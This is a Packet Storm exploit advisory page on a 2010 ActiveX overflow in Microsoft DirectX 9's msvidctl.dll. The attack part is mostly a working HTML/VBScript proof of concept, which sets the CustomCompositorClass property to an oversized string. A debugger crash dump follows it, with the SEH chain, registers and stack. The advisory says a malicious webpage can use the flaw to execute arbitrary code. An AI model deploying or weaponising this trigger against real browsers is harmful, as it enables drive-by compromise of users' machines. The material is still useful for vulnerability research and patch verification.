what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft DirectX 9 Video Mixer Renderer Active-X Overflows

Microsoft DirectX 9 Video Mixer Renderer Active-X Overflows
Posted Sep 25, 2010
Authored by Asheesh Kumar Mani Tripathi

Microsoft DirectX 9 Video Mixer Renderer suffers from Active-X related overflows in msvidctl.dll.

tags | exploit, overflow, activex
SHA-256 | c942ecbddcb8898b17ce3799be922aaf35fcfd03cb659a409f652b2b482b6e33

Microsoft DirectX 9 Video Mixer Renderer Active-X Overflows

Change Mirror Download
                    ============================================================================================

Microsoft DirectX 9 Video Mixer Renderer(msvidctl.dll) ActiveX Multiple Remote Vulnerabilities
===========================================================================================

by

Asheesh Kumar Mani Tripathi


# Vulnerability Discovered By Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company www.aksitservices.co.in

# Credit by Asheesh Anaconda

# Date 25th Sep 2010

# Description: Microsoft DirectX 9 Video Mixer Renderer ActiveX object corresponding to msvidctl.dll is susceptible to multiple vulnerabilities, including buffer overflow and integer overflow vulnerabilities.

An attacker can exploit this issue by enticing an unsuspecting user to view a malicious webpage.
Successful exploits will allow the attacker to execute arbitrary code within the context of the
application (typically Internet Explorer) that uses the ActiveX control.

It calls CustomCompositorClas in a separate thread. The classid of the affected ActiveX control is
24DC3975-09BF-4231-8655-3EE71F43837D. By enticing a user to visit a malicious page, an attacker can exploit this vulnerability in order to execute arbitrary code on a target's machine.


=============================================Proof Of Concept=============================================


<object classid='clsid:24DC3975-09BF-4231-8655-3EE71F43837D' id='ash' />
<script language='vbscript'>

targetFile = "C:\Windows\System32\msvidctl.dll"
prototype = "Property Let CustomCompositorClass As String"
memberName = "CustomCompositorClass"
progid = "MSVidCtlLib.MSVidVMR9"
argCount = 1

arg1=String(12308, "A")

ash.CustomCompositorClass = arg1

</script>


=============================================Detail =============================================


Exception Code: VC_THROW_SEH
Disasm: 7752FBAE LEAVE

Seh Chain:
--------------------------------------------------
1 60BB87E5 MSVidCtl.DLL
2 6C312960 VBSCRIPT.dll
3 77B699FA ntdll.dll


Called From Returns To
--------------------------------------------------
KERNEL32.7752FBAE msvcrt.763132FF
msvcrt.763132FF MSVidCtl.60B007A8
MSVidCtl.60B007A8 MSVidCtl.60B60250
MSVidCtl.60B60250 MSVidCtl.60B50DB8
MSVidCtl.60B50DB8 OLEAUT32.7779546D
OLEAUT32.7779546D OLEAUT32.7779565E
OLEAUT32.7779565E OLEAUT32.77795D7C
OLEAUT32.77795D7C MSVidCtl.60AFF6B6
MSVidCtl.60AFF6B6 VBSCRIPT.6C2C3EB7
VBSCRIPT.6C2C3EB7 VBSCRIPT.6C2C3E27
VBSCRIPT.6C2C3E27 VBSCRIPT.6C2C3397
VBSCRIPT.6C2C3397 VBSCRIPT.6C2C3D88
VBSCRIPT.6C2C3D88 VBSCRIPT.6C2D1302
VBSCRIPT.6C2D1302 VBSCRIPT.6C2C63EE
VBSCRIPT.6C2C63EE VBSCRIPT.6C2C6373
VBSCRIPT.6C2C6373 VBSCRIPT.6C2C6BA5
VBSCRIPT.6C2C6BA5 VBSCRIPT.6C2C6D9D
VBSCRIPT.6C2C6D9D VBSCRIPT.6C2C5103
VBSCRIPT.6C2C5103 SCROBJ.6CAF43F1
SCROBJ.6CAF43F1 SCROBJ.6CAF49AA
SCROBJ.6CAF49AA SCROBJ.6CAF4845
SCROBJ.6CAF4845 SCROBJ.6CAF47E2
SCROBJ.6CAF47E2 SCROBJ.6CAF47A7
SCROBJ.6CAF47A7 A23C33
A23C33 A16AD4
A16AD4 A13158
A13158 A122D7
A122D7 A15182
A15182 A15430
A15430 KERNEL32.7753D0E9
KERNEL32.7753D0E9 ntdll.77BA19BB
ntdll.77BA19BB ntdll.77BA198E


Registers:
--------------------------------------------------
EIP 7752FBAE -> E06D7363 -> Asc: csmcsm
EAX 0013E95C -> E06D7363 -> Asc: csmcsm
EBX 60AFACE8 -> 60B9C8EC
ECX 00000003
EDX 00000000
EDI 0013EAA4 -> AD2D71FC
ESI 0013EA94 -> 00000000
EBP 0013E9AC -> 0013E9E4
ESP 0013E95C -> E06D7363 -> Asc: csmcsm


Block Disassembly:
--------------------------------------------------
7752FB9B PUSH EAX
7752FB9C CALL 7753A4D7
7752FBA1 ADD ESP,C
7752FBA4 LEA EAX,[EBP-50]
7752FBA7 PUSH EAX
7752FBA8 CALL [774F1714]
7752FBAE LEAVE <--- CRASH
7752FBAF RETN 10
7752FBB2 NOP
7752FBB3 NOP
7752FBB4 NOP
7752FBB5 NOP
7752FBB6 NOP
7752FBB7 MOV EDI,EDI
7752FBB9 PUSH EBP


ArgDump:
--------------------------------------------------
EBP+8 E06D7363
EBP+12 00000001
EBP+16 00000003
EBP+20 0013E9D8 -> 19930520
EBP+24 E06D7363
EBP+28 00000001


Stack Dump:
--------------------------------------------------
13E95C 63 73 6D E0 01 00 00 00 00 00 00 00 AE FB 52 77 [csm...........Rw]
13E96C 03 00 00 00 20 05 93 19 F8 E9 13 00 4C F3 BB 60 [............L..`]
13E97C 7F 00 00 00 1D 01 04 18 D8 08 00 00 00 00 00 00 [................]
13E98C 20 00 00 00 00 37 1F 00 18 00 00 00 63 01 00 50 [............c..P]
13E99C 00 37 1F 00 E6 71 BC 77 FF 36 1F 00 FA 36 1F 00 [.....q.w........]



ApiLog
--------------------------------------------------

***** Installing Hooks *****
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close